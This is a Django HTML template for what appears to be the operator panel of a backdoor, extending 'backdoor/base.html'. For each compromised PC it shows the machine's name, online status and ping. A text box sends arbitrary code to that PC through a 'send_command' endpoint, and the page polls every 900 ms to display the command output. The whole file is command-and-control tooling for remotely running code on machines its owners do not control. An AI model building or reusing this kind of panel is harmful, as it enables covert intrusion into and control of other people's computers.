{% include 'backdoor/base.html' %}
{% block content %}
<div style="padding:15px;">
    <h1>{{pc.pc_name}}</h1>
    <div style="display:flex; flex-direction:row;">
        <p id="online-status-{{pc.id}}" class="offline">⚪ Checking</p>
        <p id="ping-{{pc.id}}" class="offline" style="margin-left:7px;"></p>
    </div>
    <div class="mb-3">
        <textarea class="form-control" id="exampleFormControlTextarea1" style="border:1px solid grey;color:black;" rows="10"></textarea>
    </div>
        <div class="mb-3">
            <textarea class="form-control" id="code" name="code" rows="10" style="border:1px solid grey;color:black;"></textarea>
        </div>
        <button onclick="send_command()" class="btn btn-primary">Send</button>
        <a href="{% url 'clean' pc.id %}"><button type="button" class="btn btn-dark">Clear</button></a>
    <script>
        function send_command(){
            $.ajax({
                type: 'POST',
                url : "{% url 'send_command' pc.id %}",
                data: {
                    'code': $('#code').val()
                  },
                success: function(response){
                    document.getElementById("code").value = "";
                },
                error: function(response)
                {
                    console.log("b");
                }
            });
        }
    </script>
    <script>$(document).ready(function(){
        setInterval(function(){
            var textarea = document.getElementById('exampleFormControlTextarea1');
            var scrollPosition = textarea.scrollTop;
            
            $.ajax({
                type: 'GET',
                url : "{% url 'ajax' pc.id %}",
                success: function(response){
                    console.log(response.data);
                    textarea.value = response.data;
                    textarea.scrollTop = scrollPosition;
                },
                error: function(response) {
                    console.log("b");
                }
            });
        }, 900);
    });</script>
    <script>$(document).ready(function(){
        setInterval(function(){
            $.ajax({
                type:'GET',
                url : "{% url 'ajax-pc' pc.id %}",
                success: function(response){
                    let element = document.getElementById("online-status-{{pc.id}}")
                    if(response.data == "online")
                    {
                        element.innerText = "🟢 Online"
                        element.style.color = "green"
                        let ping_element = document.getElementById("ping-{{pc.id}}") 
                        if(response.ping < 50)
                        {
                            ping_element.innerText = response.ping+"ms"      
                            ping_element.style.color = "green"
                        }
                        else if(response.ping >= 50 && response.ping < 150)
                        {
                            ping_element.innerText = response.ping+"ms"      
                            ping_element.style.color = "orange"
                        }
                        else{
                            ping_element.innerText = response.ping+"ms"      
                            ping_element.style.color = "red"
                        }
                    }
                    else {
                        element.innerText = "🔴 Offline"
                        element.style.color = "red"
                    }      
                    
                    
                },
                error: function(response)
                {
                    console.log("b");
                }
            });
        },900);
    });</script>

</div>
{% endblock content %}